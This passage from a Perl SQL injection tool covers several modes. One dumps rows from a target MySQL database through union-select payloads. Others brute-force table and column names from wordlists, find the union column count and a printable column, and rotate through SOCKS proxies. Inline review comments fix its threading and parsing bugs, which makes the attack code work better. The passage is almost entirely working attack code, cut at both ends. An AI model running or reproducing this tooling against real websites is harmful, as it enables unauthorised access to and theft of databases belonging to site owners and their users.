  1250.          }  
  1251.          $column_name_p = $content;
  1252.          $column_name_p =~ m/ussr(.*?)ussr/img;
  1253.          $column_name_p = $1; # ???-?? ???????? ? ??????? ?? ????????? ???????
  1254.          print "$column_name_p\n";
  1255.          print "----------\n";
  1256.          ## start from2 ##
  1257.          print "Get ALL data from " . $table_name . " with [ where " . $where . " ] (" . $column_name_p . ") ? (1/0): ";
  1258.          $choice = <STDIN>;
  1259.          chomp $choice;
  1260.          $thr = $kol_threads; # ???-?? ???????
  1261.          if ($choice == 1) {
  1262.               $num = -1; # ?? ????????
  1263.          } else {
  1264.               print "Enter START_position: ";
  1265.               $choice1 = <STDIN>;
  1266.               chomp $choice1;
  1267.               $num = $choice1-2;
  1268.               print "Enter END_position: ";
  1269.               $choice2 = <STDIN>;
  1270.               chomp $choice2;
  1271.               $column_name_p = $choice2-1;
  1272.               print "Dump records from [" . ($num+2) . "] to [" . ($column_name_p+1) . "]\n";
  1273.          }
  1274.          print "-----------------------------------------\n";
  1275.          print "Request method - $method\n";
  1276.          print "Threads - $kol_threads\n";
  1277.          print "Proxy - $proxy_message\n";
  1278.          print "----------------------\n";
  1279.          ## end from2
  1280.          $url18 = $sql_start . $sql_CP_start . $sql_pref1 . "concat_ws(0x3a," . $column_name . ")" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . $table_name . $plus . "where" . $plus . $where;
  1281.          for(0..$thr) {
  1282.              $trl[$_] = threads->create(\&gets5);
  1283.          }
  1284.          for(0..$thr) {
  1285.              $trl[$_]->join;
  1286.          }
         # Worker for the row dump of mode 7 with a WHERE clause. Identical to
         # gets4 except that it appends the LIMIT to $url18 (which already
         # carries the user-entered condition) instead of $url17.
         # Only $num is `: shared`; $current, $content, $sql_post and
         # $sql_header_query are per-thread copies under Perl's threads model.
         # Reads: $num, $column_name_p (last row index, fixed before the threads
         # start), $url18, $sql_flag, $source_sql, $plus, $filtr, $search,
         # $replacement, $pause.
         # Writes: one line per recovered row to STDOUT and to FILE.
         # NOTE(review): same race as gets4 — $num is read outside the lock on
         # each request line, so indexes can be fetched twice or skipped, and
         # the `while` test lets several workers overshoot $column_name_p.
         # NOTE(review): FILE is written from every thread without a lock.
         # Named sub nested in an `else` block; compiled once at file scope.
         sub gets5 {
            $| = 1;   # unbuffered STDOUT so the "\r" progress line updates
            while ($num<$column_name_p) {
               { lock($num);
               $num++; }
               if($sql_flag == 0){   # 0: the query travels in the URL
                  $current = $url18 . $plus . "limit" . $plus . $num . ",1" . $filtr;
                  $content = scan_url();
               }elsif ($sql_flag == 1) {#POST: the query travels in $sql_post
                  $current = $source_sql;
                  $sql_post = $url18 . $plus . "limit" . $plus . $num . ",1" . $filtr;
                  $content = scan_url_POST();
               } elsif($sql_flag == 2){#HEADER: every \Q$search\E in the query is rewritten to $replacement first (both set elsewhere)
                    $current = $source_sql;
                    $sql_header_query = $url18 . $plus . "limit" . $plus . $num . ",1" . $filtr;
                    $sql_header_query =~ s!\Q$search!$replacement!g;
                    $content = scan_url_HEADER();
               }  
               # A row is recognised only when both "ussr" markers come back
               # around the value; the constant literal is what server-side
               # logging and WAF/IDS rules can match on.
               if ($content =~ m/ussr(.*?)ussr/img) {
                    print "   " . $1 . "\n";
                    print FILE "  "  . $1 . "\n";
               }
               print $num . "\r";
               sleep $pause;   # $pause is set outside this chunk — presumably the per-request delay; confirm
 
            }
         }
  1314.          print "----------\n";
  1315.          print "Saved in " . "z_" . $host . ".txt\n";
  1316.          close(FILE);
  1317.          goto START;
  1318.     }
  1319. }
# Mode 8: dictionary check of table and column names. A name list is read
# from $source_table_list / $source_column_list (set elsewhere), one request is
# issued per name, and a name is reported as present when the response carries
# the "ussr" marker pair. Results are appended to "z_" . $host . ".txt".
# Control flow is label based: every sub-mode ends with `goto START1` (the
# menu below) and [3] jumps to START_global, which is outside this chunk.
if ($choice == 8) {
   START1:
 
   print "    [1] Brute table\n";
   print "    [2] Brute column\n";
   print "    [3] Main menu\n";
   print "----------\n";
   $choice = <STDIN>;
   chomp $choice;
   print "Your choice: $choice\n";
   # Connectivity probe: select version() and look for the marker pair.
   # NOTE(review): unlike mode 7 this uses scan_url() unconditionally, so the
   # probe ignores $sql_flag (POST/HEADER injection points) — presumably an
   # oversight; confirm against how scan_url() is written.
   $url19 = $sql_start . $sql_CP_start . $sql_pref1 .  "concat(0x7665723a,version())" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
   print "Check version(): ";
   $current = $url19;
   $content = scan_url();
   $ver = $content;
   $ver =~ m/ussr(.*?)ussr/img;
   # NOTE(review): $1 is not cleared by a failed match — it keeps the capture
   # of the last successful regex anywhere in the program. When the probe
   # fails, $ver can therefore hold a stale value and the "Can't get data"
   # branch is skipped. Test the match result instead: `if ($ver =~ m/.../) { $ver = $1 } else { $ver = "" }`.
   $ver = $1;
   if ($ver) {
         print " $ver \n";
   } else {
         print " Can't get data \n";
         goto START1;
   }
   print "-------------\n";
   if ($choice == 1) {
       # Results file, append mode, bareword global handle.
       # NOTE(review): two-arg open with the mode concatenated into the
       # string and no error check — if it fails every `print FILE1` below is
       # silently lost. Prefer `open(my $out, '>>', "z_$host.txt") or die "...: $!"`.
       # $host is derived from the target URL elsewhere in the file; a value
       # containing '/' or '..' changes where this file is written — confirm it
       # is restricted to a bare hostname before it is used in a path.
       open( FILE1, ">>" . "z_" .$host . ".txt" ); # results file (append)
       print "   Brute tables\n";
       print "   -------------\n";
       print FILE1 "   Brute tables\n";
       print FILE1 "   -------------\n";
       # Load the candidate names. NOTE(review): the open is unchecked — a
       # missing list leaves @tables4 empty and the only symptom is
       # "Tables: 0". @tables4 is also never emptied, so a second pass through
       # START1 appends the list again and every name is requested twice.
       open(FILE, "<", $source_table_list);
       while(<FILE>) {
         chomp;
         push(@tables4, $_);
       }
       close(FILE);
       print "Add prefix for brute tables ? ( for example - PHPBB_ ) (1/0): ";
       $choice = <STDIN>;
       chomp $choice;
       if ($choice == 1) {
              print "Enter your prefix for brute tables: ";
              $choice = <STDIN>;
              chomp $choice;
              $pref_brute = $choice;
       } else {
              $pref_brute = "";
       }
       $size = 0;
       $size = @tables4;   # scalar assignment: number of candidate names
       print "File: $source_table_list\n";
       print "Tables: $size\n";
       print "-------------\n";
       print "Request method - $method\n";
       print "Threads - $kol_threads\n";
       print "Proxy - $proxy_message\n";
       print "----------------------\n";
       $thr = $kol_threads; # number of worker threads
       $num = -1; # shared queue index; each worker increments it under lock before use
       # NOTE(review): 0..$thr creates $thr+1 threads, one more than the
       # "Threads - $kol_threads" line above reports.
       for(0..$thr) {
            $trl[$_] = threads->create(\&gets6);
       }
       for(0..$thr) {
            $trl[$_]->join;
       }
       # Worker: take the next index from the shared $num, build the query for
       # $pref_brute . $tables4[$num], and record the name when the marker
       # pair comes back. Named sub nested in an `if`; compiled at file scope.
       # NOTE(review): there is no `$num < $size` re-check after the
       # increment (gets502 in mode 9 has one), so once the queue is drained
       # $tables4[$num] is undef and a request goes out with just the prefix
       # as the table name — one wasted request per thread. $num is also read
       # outside the lock, so two workers can test the same name.
       sub gets6 {
            $| = 1;   # unbuffered STDOUT so the "\r" progress line updates
            while ($num<$size) {
               { lock($num);
               $num++; }
               $current1 = $pref_brute . $tables4[$num];
               $url25 = $sql_start . $sql_CP_start . $sql_pref1 . "concat_ws(0x3a," . $num . ")" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . $current1 . $limit . $filtr;
               $current = $url25;
               $content = scan_url();
               if ($content =~ m/ussr(.*?)ussr/img) {
                    print "   ---> " . $current1 . "\n";
                    print FILE1 "  "  . $current1 . "\n";   # unlocked write from several threads; lines may interleave
               }
               print $num . "\r";
               sleep $pause;   # $pause is set outside this chunk — presumably the per-request delay; confirm
 
            }
       }
       print "----------\n";
       print "Saved in " . "z_" . $host . ".txt\n";
       close(FILE1);
       goto START1;
   }
   if ($choice == 2) {
         # Same unchecked two-arg open as in [1]; see the note there.
         # NOTE(review): this handle is opened before the table-exists check
         # below, and the `goto START1` on failure leaves it open; the next
         # pass re-opens the same file on the same bareword handle.
         open( FILE1, ">>" . "z_" .$host . ".txt" ); # results file (append)
         print "   Brute columns\n";
         print "   -------------\n";
         print FILE1 "   Brute columns\n";
         print FILE1 "   -------------\n";
         print "Enter the table_name for brute: \n";
         $choice = <STDIN>;
         chomp $choice;
         # Only names containing '-' are backtick-quoted; everything else is
         # interpolated into the query verbatim.
         if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
         $table = $choice;
         print "Brute columns for table [ " . $table . " ]\n";
         print "-------------\n";
         print "   Check table exist: ";
         $url20 = $sql_start . $sql_CP_start . $sql_pref1 .  "concat(0x7665723a,$table)" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
         $current = $url20;
         $content = scan_url();
         $ver =$content;
         $ver =~ m/ussr(.*?)ussr/img;
         # NOTE(review): same stale-$1 problem as the version probe above —
         # when this match fails, $1 still holds the version string captured
         # a moment ago, so " Ok " is printed for a table that does not exist.
         $ver = $1;
         if ($ver) {
             print " Ok \n";
         } else {
             print " No such table... \n";
             goto START1;
         }
         # Unchecked open; @columns4 is never emptied between passes (see the
         # note on @tables4 above).
         open(FILE, "<", $source_column_list);
         while(<FILE>) {
            chomp;
            push(@columns4, $_);
         }
         close(FILE);
       print "Add prefix for brute columns? ( for example - PHPBB_ ) (1/0): ";
       $choice = <STDIN>;
       chomp $choice;
       if ($choice == 1) {
              print "Enter your prefix for brute columns: ";
              $choice = <STDIN>;
              chomp $choice;
              $pref_brute = $choice;
       } else {
              $pref_brute = "";
       }
         $size = 0;
         $size = @columns4;   # scalar assignment: number of candidate names
         print "-------------\n";
         print "File: $source_column_list\n";
         print "Columns: $size\n";
         print "-------------\n";
         print "Request method - $method\n";
         print "Threads - $kol_threads\n";
         print "Proxy - $proxy_message\n";
         print "----------------------\n";
         $thr = $kol_threads; # number of worker threads
       $num = -1; # shared queue index; each worker increments it under lock before use
       for(0..$thr) {   # $thr+1 threads, as in [1]
            $trl[$_] = threads->create(\&gets7);
       }
       for(0..$thr) {
            $trl[$_]->join;
       }
       # Worker: same shape as gets6, but the candidate name is used as the
       # selected column and $table as the FROM target. Same missing
       # post-increment bound check and unlocked read of $num as gets6.
       sub gets7 {
            $| = 1;   # unbuffered STDOUT so the "\r" progress line updates
            while ($num<$size) {
               { lock($num);
               $num++; }
               $current1 = $pref_brute . $columns4[$num];
               $url26 = $sql_start . $sql_CP_start . $sql_pref1 . "concat_ws(0x3a," . $current1 . ")" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . $table . $limit . $filtr;
               $current = $url26;
               $content = scan_url();
               if ($content =~ m/ussr(.*?)ussr/img) {
                    print "   ---> " . $current1 . "\n";
                    print FILE1 "  "  . $current1 . "\n";   # unlocked write from several threads; lines may interleave
               }
               print $num . "\r";
               sleep $pause;   # $pause is set outside this chunk — presumably the per-request delay; confirm
 
            }
       }
       print "----------\n";
       print "Saved in " . "z_" . $host . ".txt\n";
       close(FILE1);
       goto START1;
   }
   if ($choice == 3) {
       goto START_global;   # label defined outside this chunk
   }
}
  1495. if ($choice == 9) {
  1496.   if ($source_sql_c =~ m/^https:\/\/?([^\/]+)/i) {
  1497.      $host5 = $1;
  1498.      $https_flag = 1;
  1499.      print "----------------------\n";
  1500.      print "HTTPS mode enabled\n";
  1501.      print "----------------------\n";
  1502.   }
  1503.   $host = $host5;
  1504. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
  1505.     print "-----------------------------------------\n";
  1506.     print "Authorization required, wait please....";
  1507.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
  1508.     $ck1 = collect($answ1);
  1509.     $https_auth_check = 1;
  1510.     print " DONE\n";
  1511.     print "-----------------------------------------\n";
  1512. }
  1513.   if ($use_socks == 1 && $socks_check == 0) {
  1514.   $check_url = $host;
  1515.   our $query = "GET / HTTP/1.$http_protocol\r\n"
  1516.            . "Host: $check_host\r\n"
  1517.            . "Referer: http://" . $check_url . "\r\n"
  1518.            . "Accept: */*\r\n"
  1519.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
  1520.            . "Connection: close\r\n\r\n";
  1521.    print "----------------------------------------\n";
  1522.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
  1523.    print "Timeout = 5 sec:\n";
  1524.    print "----------------------------------------\n";
  1525.    $socks_check = 0;
  1526.    $check_socks = socks_check();
  1527.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
  1528.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
  1529.   if ($current_proxy_host) {
  1530.      $socks_check = 1;
  1531.      print "Will use --> $proxy_message\n";
  1532.   } else {
  1533.      $socks_check = 0;
  1534.      $proxy_message = "No";
  1535.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
  1536.   }
  1537. }
  1538.   open( FILE1, ">>" . "z_" . $host5. ".txt"); # ???? ??? ?????? ???????????
  1539.   if ($sql_mess_type == 0) {
  1540.       $mess_type = "When wrong";
  1541.   } else {
  1542.       $mess_type = "When right";
  1543.  
  1544.   }
  1545.   ## check the first 20 columns - no limit ##
  1546.   print "Threads - $kol_threads\n";
  1547.   print "Method - $method\n";
  1548.   print "Mysql inj URL - ". $source_sql_c . $plus_c . "union" . $plus_c . "select...." . $filtr_c .   "\n";
  1549.   print "Message - [" . $sql_mess .  "]\n";
  1550.   print "Message type - [" . $mess_type .  "]\n";
  1551.   print "--------------------------------------\n";
  1552.   print "Check first 20 columns - no limit\n";
  1553.   print "--------------------------------------\n";
  1554.  
  1555.   $current_column_start = 1;
  1556.   $current_column_number = 20;
  1557.   $current_column_limit = "";
  1558.               %aa = ();
  1559.               $c_number = 0;
  1560.               $good_url = "";
  1561.               $aa = gets5000();
  1562.               $data1 = "";
  1563.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
  1564.               ($good_url,$c_number) = split(/\|\|/,$data1);
  1565.               if ($good_url) {
  1566.                   print "---------------------------\n";
  1567.                   print "Column number = " . $c_number . "\n";
  1568.                   print "URL - " . $good_url . "\n";
  1569.                   print FILE1 "------------------\n";
  1570.                   print FILE1 "Number of columns:" . $c_number . "\n";
  1571.                   print FILE1 "------------------\n";
  1572.                   print FILE1 $good_url . "\n";
  1573.                   goto PRINTABLE_COLUMN;
  1574.               }
  1575.   #############################################################
  1576.  ## check the first 20 columns - limit+0,1 ##
  1577.   print "--------------------------------------\n";
  1578.   print "Check first 20 columns - limit" . $plus_c . "0,1\n";
  1579.   print "--------------------------------------\n";
  1580.  
  1581.   $current_column_start = 1;
  1582.   $current_column_number = 20;
  1583.   $current_column_limit = "0,1";
  1584.               %aa = ();
  1585.               $c_number = 0;
  1586.               $good_url = "";
  1587.               $aa = gets5000();
  1588.               $data1 = "";
  1589.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
  1590.               ($good_url,$c_number) = split(/\|\|/,$data1);
  1591.               if ($good_url) {
  1592.                   print "---------------------------\n";
  1593.                   print "Column number = " . $c_number . "\n";
  1594.                   print "URL - " . $good_url . "\n";
  1595.                   print FILE1 "------------------\n";
  1596.                   print FILE1 "Number of columns:" . $c_number . "\n";
  1597.                   print FILE1 "------------------\n";
  1598.                   print FILE1 $good_url . "\n";
  1599.                   goto PRINTABLE_COLUMN;
  1600.               }
  1601.   #############################################################
  1602.   ## check the first 20 columns - limit+1,1 ##
  1603.   print "--------------------------------------\n";
  1604.   print "Check first 20 columns - limit" . $plus_c . "1,1\n";
  1605.   print "--------------------------------------\n";
  1606.  
  1607.   $current_column_start = 1;
  1608.   $current_column_number = 20;
  1609.   $current_column_limit = "1,1";
  1610.               %aa = ();
  1611.               $c_number = 0;
  1612.               $good_url = "";
  1613.               $aa = gets5000();
  1614.               $data1 = "";
  1615.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
  1616.               ($good_url,$c_number) = split(/\|\|/,$data1);
  1617.               if ($good_url) {
  1618.                   print "---------------------------\n";
  1619.                   print "Column number = " . $c_number . "\n";
  1620.                   print "URL - " . $good_url . "\n";
  1621.                   print FILE1 "------------------\n";
  1622.                   print FILE1 "Number of columns:" . $c_number . "\n";
  1623.                   print FILE1 "------------------\n";
  1624.                   print FILE1 $good_url . "\n";
  1625.                   goto PRINTABLE_COLUMN;
  1626.               }
  1627.   #################################################################
  1628.   ## check columns from 21 to sql_max_column_number - no limit ##
  1629.   print "--------------------------------------\n";
  1630.   print "Check columns from 21 to $sql_max_column_number - no limit\n";
  1631.   print "--------------------------------------\n";
  1632.  
  1633.   $current_column_start = 21;
  1634.   $current_column_number = $sql_max_column_number;
  1635.   $current_column_limit = "";
  1636.               %aa = ();
  1637.               $c_number = 0;
  1638.               $good_url = "";
  1639.               $aa = gets5000();
  1640.               $data1 = "";
  1641.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
  1642.               ($good_url,$c_number) = split(/\|\|/,$data1);
  1643.               if ($good_url) {
  1644.                   print "---------------------------\n";
  1645.                   print "Column number = " . $c_number . "\n";
  1646.                   print "URL - " . $good_url . "\n";
  1647.                   print FILE1 "------------------\n";
  1648.                   print FILE1 "Number of columns:" . $c_number . "\n";
  1649.                   print FILE1 "------------------\n";
  1650.                   print FILE1 $good_url . "\n";
  1651.                   goto PRINTABLE_COLUMN;
  1652.               }
  1653.   ################################################################
  1654.   ## check columns from 21 to sql_max_column_number - limit+0,1 ##
  1655.   print "--------------------------------------\n";
  1656.   print "Check columns from 21 to $sql_max_column_number  - limit" . $plus_c . "0,1\n";
  1657.   print "--------------------------------------\n";
  1658.  
  1659.   $current_column_start = 21;
  1660.   $current_column_number = $sql_max_column_number;
  1661.   $current_column_limit = "0,1";
  1662.               %aa = ();
  1663.               $c_number = 0;
  1664.               $good_url = "";
  1665.               $aa = gets5000();
  1666.               $data1 = "";
  1667.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
  1668.               ($good_url,$c_number) = split(/\|\|/,$data1);
  1669.               if ($good_url) {
  1670.                   print "---------------------------\n";
  1671.                   print "Column number = " . $c_number . "\n";
  1672.                   print "URL - " . $good_url . "\n";
  1673.                   print FILE1 "------------------\n";
  1674.                   print FILE1 "Number of columns:" . $c_number . "\n";
  1675.                   print FILE1 "------------------\n";
  1676.                   print FILE1 $good_url . "\n";
  1677.                   goto PRINTABLE_COLUMN;
  1678.               }
  1679.   ################################################################
  1680.   ## check columns from 21 to sql_max_column_number - limit+1,1 ##
  1681.   print "--------------------------------------\n";
  1682.   print "Check columns from 21 to $sql_max_column_number  - limit" . $plus_c . "1,1\n";
  1683.   print "--------------------------------------\n";
  1684.  
  1685.   $current_column_start = 21;
  1686.   $current_column_number = $sql_max_column_number;
  1687.   $current_column_limit = "1,1";
  1688.               %aa = ();
  1689.               $c_number = 0;
  1690.               $good_url = "";
  1691.               $aa = gets5000();
  1692.               $data1 = "";
  1693.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
  1694.               ($good_url,$c_number) = split(/\|\|/,$data1);
  1695.               if ($good_url) {
  1696.                   print "---------------------------\n";
  1697.                   print "Column number = " . $c_number . "\n";
  1698.                   print "URL - " . $good_url . "\n";
  1699.                   print FILE1 "------------------\n";
  1700.                   print FILE1 "Number of columns:" . $c_number . "\n";
  1701.                   print FILE1 "------------------\n";
  1702.                   print FILE1 $good_url . "\n";
  1703.                   goto PRINTABLE_COLUMN;
  1704.               }
  1705.   #############################################################
  # Column-count search used by mode 9. Builds one candidate query per column
  # count in $current_column_start .. $current_column_number (with the
  # optional LIMIT in $current_column_limit), queues them in @columns_brute /
  # @columns_brute_n, runs gets502 workers over the queue and merges their
  # result hashes into %res.
  # Returns: \%res, a hash of queue index -> "url||column_count" for every
  # candidate that column_check() (defined elsewhere) accepted; empty when
  # none did. Callers sort the keys numerically and take the entries in order.
  # Side effects: appends to @columns_brute / @columns_brute_n, resets the
  # shared $num, and sets $current_column_start to 0 on the 21+ path.
  # NOTE(review): @columns_brute and @columns_brute_n are never emptied, and
  # this sub is called six times in a row in mode 9, so every call re-queues
  # all candidates of the earlier calls — $size grows each time and the
  # workers repeat requests already answered. Clear both arrays at the top.
  sub gets5000 {
                   $ii = 0;
                   $i = $current_column_start;
                   $union = "";
                   $size = 0;
                   while($i <= $current_column_number) {
                    # Grow the select list one number at a time. For the
                    # 21+ pass the first 21 numbers are added in one go, and
                    # $current_column_start is zeroed so the following
                    # iterations fall into the `< 21` branch and append.
                    if ($current_column_start < 21) {
                      if($i == 1) {
                         $union=$i;
                      } else {
                         $union = $union . "," . $i;
                      }
                    } else {
                         if($current_column_start == 21) {
                             $union = $union . "1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21";
                             $current_column_start = 0;
                         } else {
                             $union = $union . "," . $i;
                         }
                    }
                      if ($current_column_limit) {
                        $current11 = $source_sql_c . $plus_c . "union" . $plus_c . "select" . $plus_c . $union . $plus_c . "limit" . $plus_c . $current_column_limit . $filtr_c;
                      } else {
                        $current11 = $source_sql_c . $plus_c . "union" . $plus_c . "select" . $plus_c . $union . $filtr_c;
                      }
                      push(@columns_brute, $current11);
                      push(@columns_brute_n, $i);
                      $i++;
                   }
                   $size = @columns_brute;   # scalar assignment: queue length
                   %res = ();
                   $thr502 = $kol_threads; # number of worker threads (scalar $thr502 and array @thr502 are distinct variables)
                   $num = -1; # shared queue index; each worker increments it under lock before use
                   for(0..$thr502) {   # $thr502+1 threads
                      $thr502[$_] = threads->create(\&gets502);
                   }
                   # NOTE(review): a worker that finds nothing falls off the end
                   # of its while loop, so join() does not hand back a hash ref;
                   # `%{...}` then only works as a symbolic dereference because
                   # the file runs without `use strict` — under strict this
                   # line would die. Guard it: `my $r = $thr502[$_]->join; %res = (%res, %$r) if ref $r;`.
                   for(0..$thr502) {
                      %res = (%res, %{$thr502[$_]->join});
                   }
                   # Worker: pull the next queue index from the shared $num,
                   # run column_check() on that candidate ($current10/$nom are
                   # its inputs, set here as per-thread globals) and return
                   # {index => "url||count"} on the first accepted candidate.
                   # Named sub nested in gets5000; Perl compiles it at file
                   # scope, it is not a closure.
                   sub gets502 {
                            $| = 1;   # unbuffered STDOUT so the "\r" progress line updates
                            %hash = ();
                            while ($num < $size) {
                                  { lock($num);
                                  $num++; }
                                  $ii = $num;   # NOTE(review): $num is re-read outside the lock; copy it inside the locked block
                                  if ($ii < $size) {   # bound re-check after the increment (gets6/gets7 lack this)
                                     $current10 = $columns_brute[$num];
                                     $nom = $columns_brute_n[$num];
                                     $column_brute_flag = column_check();
                                     if ($column_brute_flag == 1) {
                                         $hash{$ii} = $current10 . "||" . $nom;
                                         # NOTE(review): $ii is not shared, so
                                         # setting it to $size does not stop the
                                         # other workers; they keep draining the
                                         # queue until $num reaches $size.
                                         $ii = $size;
                                         # `break` is not a Perl keyword without
                                         # `use feature 'switch'`; with no strict
                                         # it is a bareword in void context, a
                                         # no-op. The return below does the exit.
                                         break;
                                         return \%hash;
                                     }
                                  }
                                  print $num . "\r";
                                  sleep $pause;   # $pause is set outside this chunk — presumably the per-request delay; confirm
                            }
                   }
                   return \%res;
            }
  1769.  print "----------\n";
  1770.  print "Can't find column number...\n";
  1771.  close(FILE1);
  1772.  goto START;
  1773.  #################################################################
  1774.  PRINTABLE_COLUMN:
  1775.   print "--------------------------------------\n";
  1776.   print "Searching printable column - no limit\n";
  1777.   print "--------------------------------------\n";
  1778.   if (!$current_column_limit) {
  1779.         $current_column_limit= "";
  1780.   } else {
  1781.       if ($current_column_limit == "0,1") {goto LIMIT0;}
  1782.       if ($current_column_limit == "1,1") {goto LIMIT1;}
  1783.   }
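  # ---- Pass 1: plain "union select", no LIMIT ----
  # gets6000() scans one candidate request per column and returns a hashref
  # { column_index => "column||url" } for every response that echoed the
  # ussr...ussr marker.  Only one entry survives here (plain assignment in
  # the loop, so the highest-numbered hit wins); on a hit the URL is written
  # to FILE1 (opened earlier in this mode) and control goes back to the menu.
  %aa = ();
  $print_col = 0;
  $good_url = "";
  $aa = gets6000();
  $data1 = "";
  for (sort {$a <=> $b} keys %$aa) { $data1 = $aa->{$_}; }
  ($print_col,$good_url) = split(/\|\|/,$data1);
  if ($print_col) {
      print "---------------------------\n";
      print "Printable column = " . $print_col . "\n";
      print "Right url - " . $good_url . "\n";
      print FILE1 "------------------\n";
      print FILE1 "Printable column:" . $print_col . "\n";
      print FILE1 "------------------\n";
      print FILE1 $good_url . "\n";
      print "----------\n";
      print "Saved in z_" . $host5 . ".txt\n";
      # FILE1 is a write handle: a failed flush only surfaces at close().
      close(FILE1) or warn "close z_$host5.txt: $!";
      goto START;
  }
  #############################################################
  # ---- Pass 2: same search with "limit 0,1" appended ----
  # LIMIT0 is a goto target of the $current_column_limit checks above, so the
  # label and this copy of the search must stay in place.
  LIMIT0:
  print "--------------------------------------\n";
  print "Searching printable column - limit" . $plus_c . "0,1\n";
  print "--------------------------------------\n";
  $current_column_limit = "0,1";
  %aa = ();
  $print_col = 0;
  $good_url = "";
  $aa = gets6000();
  $data1 = "";
  for (sort {$a <=> $b} keys %$aa) { $data1 = $aa->{$_}; }
  ($print_col,$good_url) = split(/\|\|/,$data1);
  if ($print_col) {
      print "---------------------------\n";
      print "Printable column = " . $print_col . "\n";
      print "Right url - " . $good_url . "\n";
      print FILE1 "------------------\n";
      print FILE1 "Printable column:" . $print_col . "\n";
      print FILE1 "------------------\n";
      print FILE1 $good_url . "\n";
      print "----------\n";
      print "Saved in z_" . $host5 . ".txt\n";
      close(FILE1) or warn "close z_$host5.txt: $!";
      goto START;
  }
  #############################################################
  # ---- Pass 3: same search with "limit 1,1" appended ----
  # LIMIT1 is likewise a goto target; keep the label.
  LIMIT1:
  print "--------------------------------------\n";
  print "Searching printable column - limit" . $plus_c . "1,1\n";
  print "--------------------------------------\n";
  $current_column_limit = "1,1";
  %aa = ();
  $print_col = 0;
  $good_url = "";
  $aa = gets6000();
  $data1 = "";
  for (sort {$a <=> $b} keys %$aa) { $data1 = $aa->{$_}; }
  ($print_col,$good_url) = split(/\|\|/,$data1);
  if ($print_col) {
      print "---------------------------\n";
      print "Printable column = " . $print_col . "\n";
      print "Right url - " . $good_url . "\n";
      print FILE1 "------------------\n";
      print FILE1 "Printable column:" . $print_col . "\n";
      print FILE1 "------------------\n";
      print FILE1 $good_url . "\n";
      print "----------\n";
      print "Saved in z_" . $host5 . ".txt\n";
      close(FILE1) or warn "close z_$host5.txt: $!";
      goto START;
  }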
  1856.  #############################################################
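  #############################################################
  # gets6000 - locate a "printable" column for the UNION mode.
  #
  # Builds $c_number candidate requests: request $i puts the marker payload
  # ($sql_pref1 . $i . $sql_pref2) into column $i of "union select" and the
  # plain column number into every other column, appends
  # "limit $current_column_limit" when that global is set, then $filtr_c.
  # The candidates are fetched by $kol_threads+1 worker threads; each worker
  # claims the next index from the shared counter $num, fetches the page via
  # scan_url() (which reads the global $current) and returns on the first
  # body that echoes ussr...ussr.
  #
  # Globals read : $host5, $c_number, $sql_pref1, $sql_pref2, $source_sql_c,
  #                $plus_c, $filtr_c, $current_column_limit, $kol_threads, $pause
  # Globals set  : $host, $current, $nom, $ii, @columns_print, @columns_print_n
  # Returns      : hashref { index => "column||url" }, empty when nothing hit
  sub gets6000 {
      # Reset the candidate lists.  This sub is called once per LIMIT pass
      # and previously only ever push()ed, so passes 2 and 3 re-scanned every
      # stale URL of the earlier pass on top of their own.
      @columns_print   = ();
      @columns_print_n = ();
      $union   = "";
      $current = "";
      $host    = $host5;
      for ($i = 1; $i <= $c_number; $i++) {
          $temp = $sql_pref1 . $i . $sql_pref2;
          for ($j = 1; $j <= $c_number; $j++) {
              my $part = ($j == $i) ? $temp : $j;
              $union = ($j == 1) ? $part : $union . "," . $part;
          }
          if ($current_column_limit) {
              $current11 = $source_sql_c . $plus_c . "union" . $plus_c . "select" . $plus_c . $union . $plus_c . "limit" . $plus_c . $current_column_limit . $filtr_c;
          } else {
              $current11 = $source_sql_c . $plus_c . "union" . $plus_c . "select" . $plus_c . $union . $filtr_c;
          }
          push(@columns_print, $current11);
          push(@columns_print_n, $i);
      }
      $size = @columns_print;
      %res = ();
      $thr509 = $kol_threads;   # NB: 0..$thr509 starts $kol_threads+1 workers (same convention as the rest of the script)
      $num = -1;                # shared counter; ++ under lock hands out indices 0..$size-1
      $ii = 0;
      for (0..$thr509) {
          $thr509[$_] = threads->create(\&gets509);
      }
      for (0..$thr509) {
          %res = (%res, %{$thr509[$_]->join});
      }
      # Worker.  The index is captured while the lock is held: the previous
      # code re-read $num after unlocking, so two workers could fetch the same
      # URL and the last one could index past the end of @columns_print.
      sub gets509 {
          $| = 1;
          %hash = ();
          while ($num < $size) {
              my $idx;
              { lock($num); $idx = ++$num; }
              last if $idx >= $size;
              $ii      = $idx;
              $current = $columns_print[$idx];
              $nom     = $columns_print_n[$idx];
              $content = scan_url();
              if ($content =~ m/ussr(.*?)ussr/img) {
                  $hash{$idx} = $nom . "||" . $current;
                  return \%hash;
              }
              print $idx . "\r";
              sleep $pause;
          }
          # Always hand back a hashref so the %{ ... } dereference in the
          # join loop never sees the value of the while loop.
          return \%hash;
      }
      return \%res;
  }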
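  # None of the three passes found a column that echoes the marker.
  print "----------\n";
  print "Can't find printable column...\n";
  # FILE1 is a write handle: report a failed flush instead of dropping it.
  close(FILE1) or warn "close z_$host5.txt: $!";
  goto START;   # back to the main menu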
  1915. }
  1916. ## Mysql blind ##
  1917. if ($choice == 10) {
  # Host detection for the blind mode: only an https:// URL sets $host3 and
